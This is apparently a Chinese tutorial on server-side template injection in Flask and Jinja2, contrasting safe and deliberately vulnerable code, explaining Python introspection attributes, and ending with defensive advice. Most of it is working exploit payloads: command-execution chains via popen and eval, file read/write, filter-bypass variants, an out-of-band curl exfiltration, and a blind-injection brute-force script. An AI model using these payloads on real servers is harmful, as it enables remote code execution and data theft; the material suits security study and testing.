SSTI模板注入(Python+Jinja2) 全面教学文档<\/h1>

前提知识<\/h2>

Python基础<\/li>
Flask框架<\/li>

Jinja2模板引擎<\/li> <\/ul>

SSTI介绍<\/h2>

SSTI(Server-Side Template Injection)主要存在于使用模板渲染框架的应用中，包括：<\/p>

Python框架：jinja2、mako、tornado、django<\/li>
PHP框架：smarty、twig<\/li>

Java框架：jade、velocity<\/li> <\/ul>

漏洞成因：渲染函数对用户输入过度信任，导致模板注入漏洞，可能造成文件泄露、RCE等严重后果。<\/p>

安全原则<\/strong>：永远不要相信用户的任何输入<\/p>

漏洞成因分析<\/h2>
安全代码示例<\/h3>
from<\/span> flask import<\/span> Flask,request,render_template <\/span><\/span>from<\/span> jinja2 import<\/span> Template <\/span><\/span>app =<\/span> Flask(__name__) <\/span><\/span>app.<\/span>config['SECRET'<\/span>] =<\/span> "root:password"<\/span> <\/span><\/span> <\/span><\/span>@app<\/span>.<\/span>route('\/'<\/span>) <\/span><\/span>@app<\/span>.<\/span>route('\/index'<\/span>) <\/span><\/span>def<\/span> index<\/span>(): <\/span><\/span> return<\/span> render_template("index.html"<\/span>,title=<\/span>'SSTI_TEST'<\/span>,name=<\/span>request.<\/span>args.<\/span>get("name"<\/span>)) <\/span><\/span> <\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>: <\/span><\/span> app.<\/span>run() <\/span><\/span><\/code><\/pre><\/span> <\/span><\/span><html<\/span>> <\/span><\/span> <head<\/span>> <\/span><\/span> <title<\/span>>{{title}} - cl4y<\/title<\/span>> <\/span><\/span> <\/head<\/span>> <\/span><\/span> <body<\/span>> <\/span><\/span> <h1<\/span>>Hello, {{name}} !<\/h1<\/span>> <\/span><\/span> <\/body<\/span>> <\/span><\/span><\/html<\/span>> <\/span><\/span><\/code><\/pre>这种写法安全，因为模板已固定，用户输入不会改变模板语法结构。<\/p> 危险代码示例<\/h3> from<\/span> flask import<\/span> Flask,request <\/span><\/span>from<\/span> jinja2 import<\/span> Template <\/span><\/span>app =<\/span> Flask(__name__) <\/span><\/span>app.<\/span>config['SECRET_KEY'<\/span>] =<\/span> "password:123456789"<\/span> <\/span><\/span> <\/span><\/span>@app<\/span>.<\/span>route("\/"<\/span>) <\/span><\/span>def<\/span> index<\/span>(): <\/span><\/span> name =<\/span> request.<\/span>args.<\/span>get('name'<\/span>, 'guest'<\/span>) <\/span><\/span> t =<\/span> Template(''' <\/span><\/span><\/span><html> <\/span><\/span><\/span> <head> <\/span><\/span><\/span> <title>SSTI_TEST - cl4y<\/title> <\/span><\/span><\/span> <\/head> <\/span><\/span><\/span> <body> <\/span><\/span><\/span> <h1>Hello, <\/span>%s<\/span> !<\/h1> <\/span><\/span><\/span> <\/body> <\/span><\/span><\/span><\/html> <\/span><\/span><\/span> '''<\/span>%<\/span> (name)) <\/span><\/span> return<\/span> t.<\/span>render() <\/span><\/span><\/code><\/pre>这种写法危险，因为用户输入直接拼接进模板，可能导致SSTI漏洞。<\/p> Python基础知识<\/h2> 关键魔术方法<\/h3> __class__<\/code> - 返回对象所属的类<\/p> 示例：''.__class__<\/code> → <class 'str'><\/code><\/li> <\/ul> <\/li> __bases__<\/code> - 以元组形式返回类直接继承的类<\/p> 示例：''.__class__.__bases__<\/code> → (<class 'object'>,)<\/code><\/li> <\/ul> <\/li> __base__<\/code> - 返回类直接继承的第一个类<\/p> 示例：''.__class__.__base__<\/code> → <class 'object'><\/code><\/li> <\/ul> <\/li> __mro__<\/code> - 返回方法解析顺序<\/p> 示例：''.__class__.__mro__<\/code> → (<class 'str'>, <class 'object'>)<\/code><\/li> <\/ul> <\/li> __subclasses__()<\/code> - 获取类的所有子类<\/p> 示例：object.__subclasses__()<\/code> → 返回所有内置类的子类<\/li> <\/ul> <\/li> __init__<\/code> - 所有自带类都包含的初始化方法<\/p> <\/li> __globals__<\/code> - 获取函数所处空间下可用的module、方法和变量<\/p> 示例：function.__globals__<\/code><\/li> <\/ul> <\/li> <\/ol> 注入思路与Payload<\/h2> 基本注入思路<\/h3> 通过内置类对象获取其类<\/li> 获取基类(通常是<class 'object'><\/code>)<\/li> 获取所有子类列表<\/li> 在子类列表中寻找可利用的类进行getshell<\/li> <\/ol> 查找可利用类的方法<\/h3> from<\/span> flask import<\/span> Flask,request <\/span><\/span>from<\/span> jinja2 import<\/span> Template <\/span><\/span> <\/span><\/span>search =<\/span> 'eval'<\/span> # 可替换为其他想查找的关键字<\/span> <\/span><\/span>num =<\/span> -<\/span>1<\/span> <\/span><\/span>for<\/span> i in<\/span> ().<\/span>__class__.<\/span>__bases__[0<\/span>].<\/span>__subclasses__(): <\/span><\/span> num +=<\/span> 1<\/span> <\/span><\/span> try<\/span>: <\/span><\/span> if<\/span> search in<\/span> i.<\/span>__init__.<\/span>__globals__.<\/span>keys(): <\/span><\/span> print(i, num) <\/span><\/span> except<\/span>: <\/span><\/span> pass<\/span> <\/span><\/span><\/code><\/pre>Python2\/Python3通用Payload<\/h3> 直接使用popen<\/strong>(Python2不可用)<\/p> ""<\/span>.<\/span>__class__.<\/span>__bases__[0<\/span>].<\/span>__subclasses__()[128<\/span>].<\/span>__init__.<\/span>__globals__['popen'<\/span>]('whoami'<\/span>).<\/span>read() <\/span><\/span><\/code><\/pre><\/li> 使用os下的popen<\/strong><\/p> ""<\/span>.<\/span>__class__.<\/span>__bases__[0<\/span>].<\/span>__subclasses__()[250<\/span>].<\/span>__init__.<\/span>__globals__['os'<\/span>].<\/span>popen('whoami'<\/span>).<\/span>read() <\/span><\/span><\/code><\/pre><\/li> 使用__import__下的os<\/strong>(Python2不可用)<\/p> ""<\/span>.<\/span>__class__.<\/span>__bases__[0<\/span>].<\/span>__subclasses__()[75<\/span>].<\/span>__init__.<\/span>__globals__.<\/span>__import__('os'<\/span>).<\/span>popen('whoami'<\/span>).<\/span>read() <\/span><\/span><\/code><\/pre><\/li> 利用__builtins__下的函数<\/strong><\/p> ""<\/span>.<\/span>__class__.<\/span>__bases__[0<\/span>].<\/span>__subclasses__()[250<\/span>].<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>]['eval'<\/span>]("__import__('os').popen('id').read()"<\/span>) <\/span><\/span><\/code><\/pre><\/li> <\/ol> Python2特有Payload(文件操作)<\/h3> # 读文件<\/span> <\/span><\/span>[].<\/span>__class__.<\/span>__bases__[0<\/span>].<\/span>__subclasses__()[40<\/span>]('etc\/passwd'<\/span>).<\/span>read() <\/span><\/span> <\/span><\/span># 写文件<\/span> <\/span><\/span>""<\/span>.<\/span>__class__.<\/span>__bases__[0<\/span>].<\/span>__bases__[0<\/span>].<\/span>__subclasses__()[40<\/span>]('\/tmp'<\/span>).<\/span>write('test'<\/span>) <\/span><\/span><\/code><\/pre>通用Getshell Payload<\/h3> {%<\/span> for<\/span> c in<\/span> [].<\/span>__class__.<\/span>__base__.<\/span>__subclasses__() %<\/span>} <\/span><\/span>{%<\/span> if<\/span> c.<\/span>__name__==<\/span>'catch_warnings'<\/span> %<\/span>} <\/span><\/span>{{ c.<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>].<\/span>eval("__import__('os').popen('whoami').read()"<\/span>) }} <\/span><\/span>{%<\/span> endif %<\/span>} <\/span><\/span>{%<\/span> endfor %<\/span>} <\/span><\/span><\/code><\/pre>绕过技术<\/h2> 绕过中括号<\/strong><\/p> ""<\/span>.<\/span>__class__.<\/span>__bases__.<\/span>__getitem__(0<\/span>).<\/span>__subclasses__().<\/span>pop(128<\/span>).<\/span>__init__.<\/span>__globals__.<\/span>popen('whoami'<\/span>).<\/span>read() <\/span><\/span><\/code><\/pre><\/li> 绕过逗号+中括号<\/strong><\/p> {%<\/span> set chr=<\/span>().<\/span>__class__.<\/span>__bases__.<\/span>__getitem__(0<\/span>).<\/span>__subclasses__().<\/span>__getitem__(250<\/span>).<\/span>__init__.<\/span>__globals__.<\/span>__builtins__.<\/span>chr %<\/span>} <\/span><\/span>{{().<\/span>__class__.<\/span>__bases__[0<\/span>].<\/span>__subclasses__()[250<\/span>].<\/span>__init__.<\/span>__globals__.<\/span>os.<\/span>popen(chr(119<\/span>)%<\/span>2<\/span>bchr(104<\/span>)%<\/span>2<\/span>bchr(111<\/span>)%<\/span>2<\/span>bchr(97<\/span>)%<\/span>2<\/span>bchr(109<\/span>)%<\/span>2<\/span>bchr(105<\/span>)).<\/span>read()}} <\/span><\/span><\/code><\/pre><\/li> 绕过双大括号(DNS外带)<\/strong><\/p> {%<\/span> if<\/span> ''<\/span>.<\/span>__class__.<\/span>__bases__.<\/span>__getitem__(0<\/span>).<\/span>__subclasses__().<\/span>pop(250<\/span>).<\/span>__init__.<\/span>__globals__.<\/span>os.<\/span>popen('curl http:\/\/127.0.0.1:7999\/?i=`whoami`'<\/span>).<\/span>read()==<\/span>'p'<\/span> %<\/span>}1<\/span>{%<\/span> endif %<\/span>} <\/span><\/span><\/code><\/pre><\/li> Python2盲注<\/strong><\/p> import<\/span> requests <\/span><\/span>url =<\/span> 'http:\/\/127.0.0.1:8080\/'<\/span> <\/span><\/span> <\/span><\/span>def<\/span> check<\/span>(payload): <\/span><\/span> postdata =<\/span> {'exploit'<\/span>:payload} <\/span><\/span> r =<\/span> requests.<\/span>post(url, data=<\/span>postdata).<\/span>content <\/span><\/span> return<\/span> '~p0~'<\/span> in<\/span> r <\/span><\/span> <\/span><\/span>password =<\/span> ''<\/span> <\/span><\/span>s =<\/span> r<\/span>'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"$<\/span>\'<\/span>()*+,-.\/:;<=>?@[<\/span>\\<\/span>]^`{|}~<\/span>\'<\/span>"_%'<\/span> <\/span><\/span> <\/span><\/span>for<\/span> i in<\/span> xrange(0<\/span>,100<\/span>): <\/span><\/span> for<\/span> c in<\/span> s: <\/span><\/span> payload =<\/span> '{<\/span>% i<\/span>f "".__class__.__mro__[2].__subclasses__()[40]("\/tmp\/test").read()['<\/span>+<\/span>str(i)+<\/span>':'<\/span>+<\/span>str(i+<\/span>1<\/span>)+<\/span>'] == "'<\/span>+<\/span>c+<\/span>'" %}~p0~{<\/span>% e<\/span>ndif %}'<\/span> <\/span><\/span> if<\/span> check(payload): <\/span><\/span> password +=<\/span> c <\/span><\/span> break<\/span> <\/span><\/span> print password <\/span><\/span><\/code><\/pre><\/li> 绕过引号+中括号的通用Getshell<\/strong><\/p> {%<\/span> set chr=<\/span>().<\/span>__class__.<\/span>__bases__.<\/span>__getitem__(0<\/span>).<\/span>__subclasses__().<\/span>__getitem__(250<\/span>).<\/span>__init__.<\/span>__globals__.<\/span>__builtins__.<\/span>chr %<\/span>} <\/span><\/span>{%<\/span> for<\/span> c in<\/span> ().<\/span>__class__.<\/span>__base__.<\/span>__subclasses__() %<\/span>} <\/span><\/span>{%<\/span> if<\/span> c.<\/span>__name__==<\/span>chr(95<\/span>)%<\/span>2<\/span>bchr(119<\/span>)%<\/span>2<\/span>bchr(114<\/span>)%<\/span>2<\/span>bchr(97<\/span>)%<\/span>2<\/span>bchr(112<\/span>)%<\/span>2<\/span>bchr(95<\/span>)%<\/span>2<\/span>bchr(99<\/span>)%<\/span>2<\/span>bchr(108<\/span>)%<\/span>2<\/span>bchr(111<\/span>)%<\/span>2<\/span>bchr(115<\/span>)%<\/span>2<\/span>bchr(101<\/span>) %<\/span>} <\/span><\/span>{{ c.<\/span>__init__.<\/span>__globals__.<\/span>popen(chr(119<\/span>)%<\/span>2<\/span>bchr(104<\/span>)%<\/span>2<\/span>bchr(111<\/span>)%<\/span>2<\/span>bchr(97<\/span>)%<\/span>2<\/span>bchr(109<\/span>)%<\/span>2<\/span>bchr(105<\/span>)).<\/span>read() }} <\/span><\/span>{%<\/span> endif %<\/span>} <\/span><\/span>{%<\/span> endfor %<\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ol> 防御措施<\/h2> 避免直接将用户输入拼接到模板中<\/li> 使用安全的模板渲染方式(如第一个示例)<\/li> 对用户输入进行严格的过滤和转义<\/li> 使用沙箱环境限制模板执行能力<\/li> 定期更新框架和依赖库<\/li> <\/ol>